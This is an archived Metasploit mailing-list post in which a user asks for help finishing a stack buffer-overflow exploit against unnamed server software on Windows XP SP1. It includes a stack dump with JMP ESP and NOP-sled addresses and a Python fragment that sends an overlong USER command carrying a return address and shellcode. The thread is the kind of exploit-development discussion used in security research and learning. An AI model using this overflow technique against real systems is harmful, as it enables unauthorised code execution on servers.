Metasploit mailing list archives
No room for shellcode
From: allendb760 at googlemail.com (DB Allen)
Date: Sat, 2 May 2009 17:31:04 +0100
It's not a specific metasploit question - but I did use metasploit to generate the shellcode :-). I trying to write an exploit for a popular server based software but don't have room for the shellcode anywhere. Here is a copy of the stack (doing this on XP SP1. so no DEP): ************ *********** ******** 00A4FD40 41414141 AAAA 00A4FD44 41414141 AAAA 00A4FD48 41414141 AAAA 00A4FD4C 41414141 AAAA 00A4FD50 41414141 AAAA 00A4FD54 77D718FC ??w USER32.77D718FC -> JMP ESP 00A4FD58 90909090 ???? 00A4FD5C 90909090 ???? -> ESP 00A4FD60 90909090 ???? 00A4FD64 90909090 ???? 00A4FD68 4DEB6AFC ?j?M -> Shellcode start (should be 317 bytes) 00A4FD6C FFFFF9E8 ???? 00A4FD70 6C8B60FF ?`?l 00A4FD74 458B2424 $$?E 00A4FD78 057C8B3C <?| 00A4FD7C 8BEF0178 x?? 00A4FD80 5F8B184F O?_ 00A4FD84 49EB0120 ?I 00A4FD88 018B348B ?4? 00A4FD8C 99C031EE ?1?? 00A4FD90 74C084AC ???t 00A4FD94 20CAC107 ?? -> Shellcode goes tits up. 00A4FD98 746E6320 xxxx -> Normal program code (obsfucated) 00A4FD9C 6C492072 xxxx 00A4FDA0 6167656C xxxx 00A4FDA4 7375206C xxxx 00A4FDA8 64697265 xxxx Pointer to next SEH record 00A4FDAC 6F4C202E xxxx SE handler 00A4FDB0 206E6967 xxxx The buffer is 480 bytes to cause the overflow. Here is the relevant bit of Python: #JMP ESP XP SP1 jmp_sp1 = '\xfc\x18\xd7\x77' user = 'USER ' buff = "A" * 480 NOP = '\x90' s.connect(('192.168.2.4', XXXX)) s.recv(1024) while 1: s.send(user + buff + jmp_sp1 + NOP * 16 + shellcode + "\r\n") I'm thinking that I can include the shellcode as part of the buffer and find a static JMP [ESP-xxx] in memory, that could send the execution flow back into the buffer and to the shellcode. Is this a normal method to chose? Also is it reliable across OS's of the same service pack? If there is a better way, I'd love to hear it. Thanks, DB -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090502/f7729256/attachment.htm>
Current thread:
- No room for shellcode DB Allen (May 02)
- No room for shellcode egypt at metasploit.com (May 02)
- No room for shellcode Patrick Webster (May 03)
- No room for shellcode DB Allen (May 03)
- No room for shellcode H D Moore (May 03)
- No room for shellcode DB Allen (May 03)
- No room for shellcode H D Moore (May 03)
- No room for shellcode DB Allen (May 04)
- No room for shellcode Patrick Webster (May 05)
- No room for shellcode Patrick Webster (May 03)
- No room for shellcode egypt at metasploit.com (May 02)
- No room for shellcode Kim Guldberg (May 03)